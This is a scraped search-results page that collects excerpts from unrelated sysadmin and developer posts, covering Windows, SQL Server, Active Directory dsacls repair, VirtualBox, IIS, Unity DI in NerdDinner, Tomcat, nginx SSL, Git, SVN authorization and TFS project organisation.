Search Results

Search found 46973 results on 1879 pages for 'return path'.

Page 874/1879 | < Previous Page | 870 871 872 873 874 875 876 877 878 879 880 881  | Next Page >

  • Error 0x6ba (RPC server is unavailable) when running sfc /scannow on Windows XP in Safe Mode

    - by leeand00
    I think that my mup.sys file is corrupt. I received the following error when trying to access a network share that was located on my Windows 7 box, from my Windows XP box: No network provider accepted the given network path. After reading this I attempted to follow the directions by rebooting my computer into safe mode. After I run "sfc /scannow" I receive the following error message: The specific error code is 0x000006ba [The RPC server is unavailable]. When I go into Services, it says that the Remote Procedure Call (RPC) service is running but that the Remote Procedure Call (RPC) Locator is not running. When I try to start the Remote Procedure Call (RPC) Locator, it gives me an error saying: Error 1084: This service cannot be started in Safe Mode What can I do about this? If it can't find the Remote Procedure Call service in safe mode?

    Read the article

  • SQL SERVER – Installing AdventureWorks for SQL Server 2011

    - by pinaldave
    I just began with SQL Server 2011 Denali CTP1. The very first thing, I realized that there is no AdventureWorks Sample Database available for Denali. I quickly searched online and reached to Microsoft documentations where it provides information of the how to install (restore) AdventureWorks for SQL Server 2011 for Denali. Download the AdventureWorks from here. Run following script (replace your path of mdf file. CREATE DATABASE AdventureWorks2008R2 ON (FILENAME = 'C:\SQL 11 CTP1\CTP1\AdventureWorks2008R2_Data.mdf') FOR ATTACH_REBUILD_LOG ; When you run above script it will give you following message and you are DONE! File activation failure. The physical file name "C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\DATA\AdventureWorks2008R2_Log.ldf" may be incorrect. New log file 'C:\SQL 11 CTP1\CTP1\AdventureWorks2008R2_log.ldf' was created. Converting database 'AdventureWorks2008R2' from version 679 to the current version 684. Database 'AdventureWorks2008R2' running the upgrade step from version 679 to version 680. Database 'AdventureWorks2008R2' running the upgrade step from version 680 to version 681. Database 'AdventureWorks2008R2' running the upgrade step from version 681 to version 682. Database 'AdventureWorks2008R2' running the upgrade step from version 682 to version 683. Database 'AdventureWorks2008R2' running the upgrade step from version 683 to version 684. I will soon write my experience about Denali. However, SQL Server Management Studio more started to look a like Visual Studio. Reference: Pinal Dave (http://blog.sqlauthority.com) Filed under: Pinal Dave, SQL, SQL Authority, SQL Backup and Restore, SQL Query, SQL Scripts, SQL Server, SQL Server Management Studio, SQL Tips and Tricks, T SQL, Technology

    Read the article

  • [Visual Studio Extension Of The Day] Test Scribe for Visual Studio Ultimate 2010 and Test Professional 2010

    - by Hosam Kamel
      Test Scribe is a documentation power tool designed to construct documents directly from the TFS for test plan and test run artifacts for the purpose of discussion, reporting etc... . Known Issues/Limitations Customizing the generated report by changing the template, adding comments, including attachments etc… is not supported While opening a test plan summary document in  Office 2007, if you get the warning: “The file Test Plan Summary cannot be opened because there are problems with the contents” (with Details: ‘The file is corrupt and cannot be opened’), click ‘OK’. Then, click ‘Yes’ to recover the contents of the document. This will then open the document in Office 2007. The same problem is not found in Office 2010. Generated documents are stored by default in the “My documents” folder. The output path of the generated report cannot be modified. Exporting word documents for individual test suites or test cases in a test plan is not supported. Download it from Visual Studio Extension Manager Originally posted at "Hosam Kamel| Developer & Platform Evangelist" http://blogs.msdn.com/hkamel

    Read the article

  • Modifying AD Schema permissions from the command line

    - by Ryan Roussel
    Recently while making some changes for a client, I accidently dug myself into a pretty deep hole.  I was trying to explicitly deny a certain user from reading a few group policies including the Default Domain Policy.  When I went in to make the change I accidently denied Authenticated Users rather than the AD user object.  This of course made the GPO inaccessible to all users including any with domain admin rights.  The policy could no longer be modified in the GPMC and worse, changes could not be made through ADSIedit.   The errors I was getting from inside ADSIedit when trying to edit the container looked like this This object has one or more property sheets currently open. Invalid path to object The only solution was to strip Authenticated Users from the container ACL completely in the schema, then re-add it back with the default read and apply rights.  To perform this action, I used a command I had never used before:  DSALCS.exe  It’s part of the DSMOD group of tools.  Since this command interacts with the actual schema, you have to know the full LDAP container or object name.  In this case the GUID of the Default Domain Policy: {31B2F340-016D-11D2-945F-00C04FB984F9}   The actual commands I ran looked like this:   To display the current ACL of the container: c:\>dsacls “cn={31B2F340-016D-11D2-945F-00C04FB984F9},cn=Policies,cn=System, dc=domain,dc=com” /A To strip Authenticated Users from the ACL of the container: c:\>dsacls “cn={31B2F340-016D-11D2-945F-00C04FB984F9},cn=Policies,cn=System, dc=domain,dc=com” /R “NT Authority\Authenticated Users”   For full reference of the DSACLS.EXE command visit: http://support.microsoft.com/kb/281146 Once the Authenticated Users was cleared from the ACL, I was able to use Group Policy Management Console to reassign the default permissions.

    Read the article

  • Ubuntu 13.10 install ISO crashes on VirtualBox Mac 4.3

    - by John Allsup
    Does anybody know what to do about this? Machine is a 2008 Core 2 Duo iMac with 4GB RAM. (And 64bit Debian 7 boots OK, but I've not tried installing under the latest version of VirtualBox as I have just upgraded VBox today.) VirtualBox 4.3, upon trying to boot a machine with the Ubuntu 13.10 (64bit) iso (with the VM configured for Ubuntu 64bit) crashes, with the following information: Failed to open a session for the virtual machine Ubuntu64. The VM session was aborted. Result Code: NS_ERROR_FAILURE (0x80004005) Component: SessionMachine Interface: ISession {12f4dcdb-12b2-4ec1-b7cd-ddd9f6c5bf4d} === Head of crash dump is below Process: VirtualBoxVM [716] Path: /Applications/VirtualBox.app/Contents/MacOS/VirtualBoxVM Identifier: VirtualBoxVM Version: ??? (???) Code Type: X86 (Native) Parent Process: VBoxSVC [644] Date/Time: 2013-10-17 22:58:23.679 +0100 OS Version: Mac OS X 10.6.8 (10K549) Report Version: 6 Exception Type: EXC_BAD_ACCESS (SIGBUS) Exception Codes: KERN_PROTECTION_FAILURE at 0x0000000000000040 Crashed Thread: 0 Dispatch queue: com.apple.main-thread Thread 0 Crashed: Dispatch queue: com.apple.main-thread 0 com.apple.CoreFoundation 0x92a25c03 CFSetApplyFunction + 83 1 com.apple.framework.IOKit 0x95557ad4 __IOHIDManagerInitialEnumCallback + 69 2 com.apple.CoreFoundation 0x92a2442b __CFRunLoopDoSources0 + 1563 3 com.apple.CoreFoundation 0x92a21eef __CFRunLoopRun + 1071 4 com.apple.CoreFoundation 0x92a213c4 CFRunLoopRunSpecific + 452 5 com.apple.CoreFoundation 0x92a211f1 CFRunLoopRunInMode + 97 6 com.apple.HIToolbox 0x98eb5e04 RunCurrentEventLoopInMode + 392 7 com.apple.HIToolbox 0x98eb5af5 ReceiveNextEventCommon + 158 8 com.apple.HIToolbox 0x98eb5a3e BlockUntilNextEventMatchingListInMode + 81 9 com.apple.AppKit 0x9971b595 _DPSNextEvent + 847 10 com.apple.AppKit 0x9971add6 -[NSApplication nextEventMatchingMask:untilDate:inMode:dequeue:] + 156 11 com.apple.AppKit 0x996dd1f3 -[NSApplication run] + 821 12 QtGuiVBox 0x019f19e1 QEventDispatcherMac::processEvents(QFlags<QEventLoop::ProcessEventsFlag>) + 1505 13 QtCoreVBox 0x018083b1 QEventLoop::processEvents(QFlags<QEventLoop::ProcessEventsFlag>) + 65 14 QtCoreVBox 0x018086fa QEventLoop::exec(QFlags<QEventLoop::ProcessEventsFlag>) + 170 15 QtGuiVBox 0x01eea9e5 QDialog::exec() + 261 16 VirtualBox.dylib 0x011234b8 TrustedMain + 1108104 17 VirtualBox.dylib 0x01126d68 TrustedMain + 1122616 18 VirtualBox.dylib 0x010fac19 TrustedMain + 942057 19 VirtualBox.dylib 0x010f9b3d TrustedMain + 937741 20 VirtualBox.dylib 0x010f81dd TrustedMain + 931245 21 VirtualBox.dylib 0x010f85b8 TrustedMain + 932232 22 VirtualBox.dylib 0x0109d4f8 TrustedMain + 559304 23 VirtualBox.dylib 0x0101521e TrustedMain + 1518 24 ...virtualbox.app.VirtualBoxVM 0x00002e7e start + 2766 25 ...virtualbox.app.VirtualBoxVM 0x000024b5 start + 261 26 ...virtualbox.app.VirtualBoxVM 0x000023e5 start + 53 ==== And please somebody fix the code so that you can just delimit large blocks of code at the start and the end without indenting every line manually by 4 spaces.

    Read the article

  • 401 - Unauthorized On Server 2008 R2 IIS 7.5

    - by mxmissile
    I have a web application deployed to Server 2008 IIS 7.5 box. From remote it gives this error: 401 - Unauthorized: Access is denied due to invalid credentials. (remote = desktops on the same LAN) Have tried several remote clients using different browsers, all the same result. (IE, FF, and Chrome) Hitting the application from the desktop of the server itself works flawlessly. The application is using Anonymous Authentication. The application is written in .NET 4.0 Asp.Net using the MVC framework. Sysinternals procmon returns these 2 results for each request: FAST IO DISALLOWED and PATH NOT FOUND. I have 2 other MVC apps running fine on the same server. I have checked the security on the folders and they all match. App runs fine on a Server 2008 IIS 7.0 box. Nothing shows up in the Event log on the server related to this. Pulling my hair out here, any troubleshooting tips?

    Read the article

  • Dependency Injection in ASP.NET MVC NerdDinner App using Unity 2.0

    - by shiju
    In my previous post Dependency Injection in ASP.NET MVC NerdDinner App using Ninject, we did dependency injection in NerdDinner application using Ninject. In this post, I demonstrate how to apply Dependency Injection in ASP.NET MVC NerdDinner App using Microsoft Unity Application Block (Unity) v 2.0.Unity 2.0Unity 2.0 is available on Codeplex at http://unity.codeplex.com . In earlier versions of Unity, the ObjectBuilder generic dependency injection mechanism, was distributed as a separate assembly, is now integrated with Unity core assembly. So you no longer need to reference the ObjectBuilder assembly in your applications. Two additional Built-In Lifetime Managers - HierarchicalifetimeManager and PerResolveLifetimeManager have been added to Unity 2.0.Dependency Injection in NerdDinner using UnityIn my Ninject post on NerdDinner, we have discussed the interfaces and concrete types of NerdDinner application and how to inject dependencies controller constructors. The following steps will configure Unity 2.0 to apply controller injection in NerdDinner application. Step 1 – Add reference for Unity Application BlockOpen the NerdDinner solution and add  reference to Microsoft.Practices.Unity.dll and Microsoft.Practices.Unity.Configuration.dllYou can download Unity from at http://unity.codeplex.com .Step 2 – Controller Factory for Unity The controller factory is responsible for creating controller instances.We extend the built in default controller factory with our own factory for working Unity with ASP.NET MVC. public class UnityControllerFactory : DefaultControllerFactory {     protected override IController GetControllerInstance(RequestContext reqContext, Type controllerType)     {         IController controller;         if (controllerType == null)             throw new HttpException(                     404, String.Format(                         "The controller for path '{0}' could not be found" +         "or it does not implement IController.",                     reqContext.HttpContext.Request.Path));           if (!typeof(IController).IsAssignableFrom(controllerType))             throw new ArgumentException(                     string.Format(                         "Type requested is not a controller: {0}",                         controllerType.Name),                         "controllerType");         try         {             controller = MvcUnityContainer.Container.Resolve(controllerType)                             as IController;         }         catch (Exception ex)         {             throw new InvalidOperationException(String.Format(                                     "Error resolving controller {0}",                                     controllerType.Name), ex);         }         return controller;     }   }   public static class MvcUnityContainer {     public static IUnityContainer Container { get; set; } }  Step 3 – Register Types and Set Controller Factory private void ConfigureUnity() {     //Create UnityContainer               IUnityContainer container = new UnityContainer()     .RegisterType<IFormsAuthentication, FormsAuthenticationService>()     .RegisterType<IMembershipService, AccountMembershipService>()     .RegisterInstance<MembershipProvider>(Membership.Provider)     .RegisterType<IDinnerRepository, DinnerRepository>();     //Set container for Controller Factory     MvcUnityContainer.Container = container;     //Set Controller Factory as UnityControllerFactory     ControllerBuilder.Current.SetControllerFactory(                         typeof(UnityControllerFactory));            } Unity 2.0 provides a fluent interface for type configuration. Now you can call all the methods in a single statement.The above Unity configuration specified in the ConfigureUnity method tells that, to inject instance of DinnerRepositiry when there is a request for IDinnerRepositiry and  inject instance of FormsAuthenticationService when there is a request for IFormsAuthentication and inject instance of AccountMembershipService when there is a request for IMembershipService. The AccountMembershipService class has a dependency with ASP.NET Membership provider. So we configure that inject the instance of Membership Provider.After the registering the types, we set UnityControllerFactory as the current controller factory. //Set container for Controller Factory MvcUnityContainer.Container = container; //Set Controller Factory as UnityControllerFactory ControllerBuilder.Current.SetControllerFactory(                     typeof(UnityControllerFactory)); When you register a type  by using the RegisterType method, the default behavior is for the container to use a transient lifetime manager. It creates a new instance of the registered, mapped, or requested type each time you call the Resolve or ResolveAll method or when the dependency mechanism injects instances into other classes. The following are the LifetimeManagers provided by Unity 2.0ContainerControlledLifetimeManager - Implements a singleton behavior for objects. The object is disposed of when you dispose of the container.ExternallyControlledLifetimeManager - Implements a singleton behavior but the container doesn't hold a reference to object which will be disposed of when out of scope.HierarchicalifetimeManager - Implements a singleton behavior for objects. However, child containers don't share instances with parents.PerResolveLifetimeManager - Implements a behavior similar to the transient lifetime manager except that instances are reused across build-ups of the object graph.PerThreadLifetimeManager - Implements a singleton behavior for objects but limited to the current thread.TransientLifetimeManager - Returns a new instance of the requested type for each call. (default behavior)We can also create custome lifetime manager for Unity container. The following code creating a custom lifetime manager to store container in the current HttpContext. public class HttpContextLifetimeManager<T> : LifetimeManager, IDisposable {     public override object GetValue()     {         return HttpContext.Current.Items[typeof(T).AssemblyQualifiedName];     }     public override void RemoveValue()     {         HttpContext.Current.Items.Remove(typeof(T).AssemblyQualifiedName);     }     public override void SetValue(object newValue)     {         HttpContext.Current.Items[typeof(T).AssemblyQualifiedName]             = newValue;     }     public void Dispose()     {         RemoveValue();     } }  Step 4 – Modify Global.asax.cs for configure Unity container In the Application_Start event, we call the ConfigureUnity method for configuring the Unity container and set controller factory as UnityControllerFactory void Application_Start() {     RegisterRoutes(RouteTable.Routes);       ViewEngines.Engines.Clear();     ViewEngines.Engines.Add(new MobileCapableWebFormViewEngine());     ConfigureUnity(); }Download CodeYou can download the modified NerdDinner code from http://nerddinneraddons.codeplex.com

    Read the article

  • Tomcat6 Manager Webapp is 404 on apt-get install on Ubuntu 10.10

    - by Noel
    http://localhost:8080/manager/html gives a 404 error on apt-get install of tomcat6 (6.0.28 on JVM 1.6.0_20-b20 on 2.6.35-27-generic amd64). http://localhost:8080/host-manager/html works. Lists one Host name, localhost. cat /usr/share/tomcat6/conf/tomcat-users.xml <tomcat-users> <role rolename="admin"/> <role rolename="manager" /> <user username="tomcatuser" password="Password1" roles="admin,manager"/> </tomcat-users> cat /usr/share/tomcat6/conf/Catalina/localhost/manager.xml <Context path="/manager" docBase="/usr/share/tomcat6-admin/manager" antiResourceLocking="false" privileged="true" /> <role name="manager" /> <user name="manager" password="Password1" roles="manager" /> <user name="tomcatuser" password="Password1" roles="manager" /> Those two files are the only documentation I've seen on how to setup the Manager webapp, and they seem to be compliant with the requirements.

    Read the article

  • Tomcat6 Manager Webapp is 404 on apt-get install on Ubuntu 10.10

    - by Noel
    http://localhost:8080/manager/html gives a 404 error on apt-get install of tomcat6 (6.0.28 on JVM 1.6.0_20-b20 on 2.6.35-27-generic amd64). http://localhost:8080/host-manager/html works. Lists one Host name, localhost. Installed tomcat6-admin with apt-get. $ ls dpkg -l | grep -i tomcat6-admin ii tomcat6-admin 6.0.28-2ubuntu1.1 Servlet and JSP engine -- admin web applications $ cat /usr/share/tomcat6/conf/tomcat-users.xml <tomcat-users> <role rolename="admin"/> <role rolename="manager" /> <user username="tomcatuser" password="Password1" roles="admin,manager"/> </tomcat-users> $ cat /usr/share/tomcat6/conf/Catalina/localhost/manager.xml <Context path="/manager" docBase="/usr/share/tomcat6-admin/manager" antiResourceLocking="false" privileged="true" /> <role name="manager" /> <user name="manager" password="Password1" roles="manager" /> <user name="tomcatuser" password="Password1" roles="manager" /> Those two files are the only documentation I've seen on how to setup the Manager webapp, and they seem to be compliant with the requirements.

    Read the article

  • Nginx ssl - SSL: error:0906D06C:PEM routines:PEM_read_bio:no start line

    - by Alex
    I am trying to enable ssl on a server using a certificate from 123-reg but I keep getting this error: nginx: [emerg] SSL_CTX_use_certificate_chain_file("/opt/nginx/conf/cleantechlms.crt") failed (SSL: error:0906D06C:PEM routines:PEM_read_bio:no start line error:140DC009:SSL routines:SSL_CTX_use_certificate_chain_file:PEM lib) This is my nginx config: server { listen 443; server_name a-fake-url.com; root /file/path/public; passenger_enabled on; ssl on; ssl_certificate /opt/nginx/conf/cleantechlms.crt; ssl_certificate_key /opt/nginx/conf/cleantechlms.key; } I have tried setting my crt and key to full file permissions but there is no difference. My crt file is the crt I was issued concatenated with the ca crt. Update I have tried copying both the keys in sperate files and then running 'cat mykey.crt ca.cert' Also I tried manually copying the keys into the same file. Any ideas?

    Read the article

  • ASP.NET MVC Custom Profile Provider

    - by Ben Griswold
    It’s been a long while since I last used the ASP.NET Profile provider. It’s a shame, too, because it just works with very little development effort: Membership tables installed? Check. Profile enabled in web.config? Check. SqlProfileProvider connection string set? Check.  Profile properties defined in said web.config file? Check. Write code to set value, read value, build and test. Check. Check. Check.  Yep, I thought the built-in Profile stuff was pure gold until I noticed how the user-based information is persisted to the database. It’s stored as xml and, well, that was going to be trouble if I ever wanted to query the profile data.  So, I have avoided the super-easy-to-use ASP.NET Profile provider ever since, until this week, when I decided I could use it to store user-specific properties which I am 99% positive I’ll never need to query against ever.  I opened up my ASP.NET MVC application, completed steps 1-4 (above) in about 3 minutes, started writing my profile get/set code and that’s where the plan broke down.  Oh yeah. That’s right.  Visual Studio auto-generates a strongly-type Profile reference for web site projects but not for ASP.NET MVC or Web Applications.  Bummer. So, I went through the steps of getting a customer profile provider working in my ASP.NET MVC application: First, I defined a CurrentUser routine and my profile properties in a custom Profile class like so: using System.Web.Profile; using System.Web.Security; using Project.Core;   namespace Project.Web.Context {     public class MemberPreferencesProfile : ProfileBase     {         static public MemberPreferencesProfile CurrentUser         {             get             {                 return (MemberPreferencesProfile)                     Create(Membership.GetUser().UserName);             }         }           public Enums.PresenceViewModes? ViewMode         {             get { return ((Enums.PresenceViewModes)                     ( base["ViewMode"] ?? Enums.PresenceViewModes.Category)); }             set { base["ViewMode"] = value; Save(); }         }     } } And then I replaced the existing profile configuration web.config with the following: <profile enabled="true" defaultProvider="MvcSqlProfileProvider"          inherits="Project.Web.Context.MemberPreferencesProfile">        <providers>     <clear/>     <add name="MvcSqlProfileProvider"          type="System.Web.Profile.SqlProfileProvider, System.Web,          Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a"          connectionStringName="ApplicationServices" applicationName="/"/>   </providers> </profile> Notice that profile is enabled, I’ve defined the defaultProvider and profile is now inheriting from my custom MemberPreferencesProfile class.  Finally, I am now able to set and get profile property values nearly the same way as I did with website projects: viewMode = MemberPreferencesProfile.CurrentUser.ViewMode; MemberPreferencesProfile.CurrentUser.ViewMode = viewMode;

    Read the article

  • Using AuthzSVNAccessFile for controlling SVN Access produces HTTP 400 Bad Request

    - by meeper
    I have a new repository on an existing subversion server that requires us to perform path based authorization within the repository. I found that the AuthzSVNAccessFile directive in apache is directly responsible for allowing this functionality. After fixing several other problems such as AuthzSVNAccessFile preventing SVNListParentPath from operating properly, I am left with one single problem. I can checkout, I can update, I can commit, BUT I cannot execute an SVN COPY for performing branch/tagging operations. The moment I comment out the AuthzSVNAccessFile line in the Apache config everything works as expected except the obvious path authorizations. Versions: The server OS is Debian 6.0.7 (Squeeze) Apache 2.2.16-6+squeeze11 Server Subversion 1.6.12dfsg-7 Clients are running windows Clients tried are: TortoiseSVN 1.8.2 Build 24708 64bit SVN CLI Client 1.8.3 (r1516576) Authentication is performed via AD to a Windows 2003 domain and appears to be operating normally. I have stripped out all other configurations and repository setups to produce this single configuration that reproduces the problem. Apache Configuration: <VirtualHost *:443> ServerName svn-test.company.com ServerAlias /svn-test ServerAdmin [email protected] SSLEngine On SSLCertificateFile /etc/apache2/apache.pem ErrorLog /var/log/apache2/svn-test_error.log LogLevel warn CustomLog /var/log/apache2/svn-test_access.log combined ServerSignature On # Repository Access to all Repositories <Location "/"> DAV svn SVNParentPath /var/svn SVNListParentPath on AuthBasicProvider ldap AuthType Basic AuthzLDAPAuthoritative Off AuthName "Subversion Test Repository System" AuthLDAPURL "ldap://adserver.company.com:389/DC=corp,DC=company,DC=com?sAMAccountName?sub?(objectClass=*)" NONE AuthLDAPBindDN "CN=service_account,OU=ServiceIDs,OU=corp,OU=Delegated,DC=na,DC=corp,DC=company,DC=com" AuthLDAPBindPassword service_account_password Require valid-user SSLRequireSSL </Location> # <LocationMatch /.+> is a really dirty trick to make listing of repositories work # http://d.hatena.ne.jp/shimonoakio/20080130/1201686016 <LocationMatch /.+> AuthzSVNAccessFile /etc/apache2/svn_path_auth </LocationMatch> </VirtualHost> SVN Access File: [/] * = rw The repository used (AuthTestBasic) consists of the following directory structure and contains no externals (this is a literal listing, not an example): / /branches/ /tags/ /trunk/ /trunk/somefile.txt Tortoise produces the following error during a tag operation in it's tag result window: Adding directory failed: COPY on /authtestbasic/!svn/bc/2/trunk (400 Bad Request) The svn.exe CLI client produces the following error: C:\Users\e20epkt>svn copy https://servername/authtestbasic/trunk https://servername/authtestbasic/tags/tag1 -m "svn cli client" svn: E175002: Adding directory failed: COPY on /authtestbasic/!svn/bc/2/trunk (400 Bad Request) The Apache error log has nothing in it, however the apache access log has the following in it (IP addresses and usernames changed obviously): 10.1.2.100 - - [17/Oct/2013:11:53:40 -0700] "OPTIONS /authtestbasic/trunk HTTP/1.1" 401 2595 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708" 10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "OPTIONS /authtestbasic/trunk HTTP/1.1" 200 996 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708" 10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "OPTIONS /authtestbasic/trunk HTTP/1.1" 200 884 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708" 10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "PROPFIND /authtestbasic/trunk HTTP/1.1" 207 692 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708" 10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "PROPFIND /authtestbasic/!svn/vcc/default HTTP/1.1" 207 596 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708" 10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "REPORT /authtestbasic/!svn/bc/0/trunk HTTP/1.1" 404 580 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708" 10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "PROPFIND /authtestbasic/!svn/vcc/default HTTP/1.1" 207 596 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708" 10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "REPORT /authtestbasic/!svn/bc/2/trunk HTTP/1.1" 200 674 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708" 10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "PROPFIND /authtestbasic/!svn/bc/2/trunk HTTP/1.1" 207 548 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708" 10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "PROPFIND /authtestbasic/tags/tag1 HTTP/1.1" 404 580 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708" 10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "MKACTIVITY /authtestbasic/!svn/act/f1e9dc07-fb5e-5a41-ac22-907705ef6e5e HTTP/1.1" 201 708 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708" 10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "PROPFIND /authtestbasic/tags HTTP/1.1" 207 580 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708" 10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "CHECKOUT /authtestbasic/!svn/vcc/default HTTP/1.1" 201 708 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708" 10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "PROPPATCH /authtestbasic/!svn/wbl/f1e9dc07-fb5e-5a41-ac22-907705ef6e5e/2 HTTP/1.1" 207 596 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708" 10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "CHECKOUT /authtestbasic/!svn/ver/1/tags HTTP/1.1" 201 724 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708" 10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "COPY /authtestbasic/!svn/bc/2/trunk HTTP/1.1" 400 596 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708" 10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "DELETE /authtestbasic/!svn/act/f1e9dc07-fb5e-5a41-ac22-907705ef6e5e HTTP/1.1" 204 1956 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708" You'll see that the second to last line contains the COPY command with the HTTP 400 response, however, there doesn't appear to be any indication as to why. Please note that, while yes this is a test repository on a test server, I am experiencing this same issue in this test setup where I have eliminated all other possible causes (mixed repository configurations, externals, etc). I have also confirmed that all files for the repository (/var/svn/authtestbasic) are owned by the Apache user www-data.

    Read the article

  • Install Git under OSX Mavericks

    - by Jan Hancic
    I've just completed a fresh install of Mavericks. Then I went to git-scm.com and downloaded the Mac installer and installed Git from that. Now whenever I go into the terminal and type git I get this: xcode-select: note: no developer tools were found at '/Applications/Xcode.app', requesting install. Choose an option in the dialog to download the command line developer tools. I also this dialog: The git installer installed git into /usr/local/git/bin and I've added this to my PATH but still no dice. What am I doing wrong here? I don't want to install xcode just so I can use git.

    Read the article

  • When should I use Areas in TFS instead of Team Projects

    - by Martin Hinshelwood
    Well, it depends…. If you are a small company that creates a finite number of internal projects then you will find it easier to create a single project for each of your products and have TFS do the heavy lifting with reporting, SharePoint sites and Version Control. But what if you are not… Update 9th March 2010 Michael Fourie gave me some feedback which I have integrated. Ed Blankenship via @edblankenship offered encouragement and a nice quote. Ewald Hofman gave me a couple of Cons, and maybe a few more soon. Ewald’s company, Avanade, currently uses Areas, but it looks like the manual management is getting too much and the project is getting cluttered. What if you are likely to have hundreds of projects, possibly with a multitude of internal and external projects? You might have 1 project for a customer or 10. This is the situation that most consultancies find themselves in and thus they need a more sustainable and maintainable option. What I am advocating is that we should have 1 “Team Project” per customer, and use areas to create “sub projects” within that single “Team Project”. "What you describe is what we generally do internally and what we recommend. We make very heavy use of area path to categorize the work within a larger project." - Brian Harry, Microsoft Technical Fellow & Product Unit Manager for Team Foundation Server   "We tend to use areas to segregate multiple projects in the same team project and it works well." - Tiago Pascoal, Visual Studio ALM MVP   "In general, I believe this approach provides consistency [to multi-product engagements] and lowers the administration and maintenance costs. All good." - Michael Fourie, Visual Studio ALM MVP   “@MrHinsh BTW, I'm very much a fan of very large, if not huge, team projects in TFS. Just FYI :) Use Areas & Iterations.” Ed Blankenship, Visual Studio ALM MVP   This would mean that SSW would have a single Team Project called “SSW” that contains all of our internal projects and consequently all of the Areas and Iteration move down one hierarchy to accommodate this. Where we would have had “\SSW\Sprint 1” we now have “\SSW\SqlDeploy\Sprint1” with “SqlDeploy” being our internal project. At the moment SSW has over 70 internal projects and more than 170 total projects in TFS. This method has long term benefits that help to simplify the support model for companies that often have limited internal support time and many projects. But, there are implications as TFS does not provide this model “out-of-the-box”. These implications stretch across Areas, Iterations, Queries, Project Portal and Version Control. Michael made a good comment, he said: I agree with your approach, assuming that in a multi-product engagement with a client, they are happy to adopt the same process template across all products. If they are not, then it’ll either be easy to convince them or there is a valid reason for having a different template - Michael Fourie, Visual Studio ALM MVP   At SSW we have a standard template that we use and this is applied across the board, to all of our projects. We even apply any changes to the core process template to all of our existing projects as well. If you have multiple projects for the same clients on multiple templates and you want to keep it that way, then this approach will not work for you. However, if you want to standardise as we have at SSW then this approach may benefit you as well. Implications around Areas Areas should be used for topological classification/isolation of work items. You can think of this as architecture areas, organisational areas or even the main features of your application. In our scenario there is an additional top level item that represents the Project / Product that we want to chop our Team Project into. Figure: Creating a sub area to represent a product/project is easy. <teamproject> <teamproject>\<Functional Area/module whatever> Becomes: <teamproject> <teamproject>\<ProjectName>\ <teamproject>\<ProjectName>\<Functional Area/module whatever> Implications around Iterations Iterations should be used for chronological classification/isolation of work items. This could include isolated time boxes, milestones or release timelines and really depends on the logical flow of your project or projects. Due to the new level in Area we need to add the same level to Iteration. This is primarily because it is unlikely that the sprints in each of your projects/products will start and end at the same time. This is just a reality of managing multiple projects. Figure: Adding the same Area value to Iteration as the top level item adds flexibility to Iteration. <teamproject>\Sprint 1 Or <teamproject>\Release 1\Sprint 1 Becomes: <teamproject>\<ProjectName>\Sprint 1 Or <teamproject>\<ProjectName>\Release 1\Sprint 1 Implications around Queries Queries are used to filter your work items based on a specified level of granularity. There are a number of queries that are built into a project created using the MSF Agile 5.0 template, but we now have multiple projects and it would be a pain to have to edit all of the work items every time we changed project, and that would only allow one team to work on one project at a time.   Figure: The Queries that are created in a normal MSF Agile 5.0 project do not quite suit our new needs. In order for project contributors to be able to query based on their project we need a couple of things. The first thing I did was to create an “_Area Template” folder that has a copy of the project layout with all the queries setup to filter based on the “_Area Template” Area and the “_Sprint template” you can see in the Area and Iteration views. Figure: The template is currently easily drag and drop, but you then need to edit the queries to point at the right Area and Iteration. This needs a tool. I then created an “Areas” folder to hold all of the area specific queries. So, when you go to create a new TFS Sub-Project you just drag “_Area Template” while holding “Ctrl” and drop it onto “Areas”. There is a little setup here. That said I managed it in around 10 minutes which is not so bad, and I can imagine it being quite easy to build a tool to create these queries Figure: These new queries can be configured in around 10 minutes, which includes setting up the Area and Iteration as 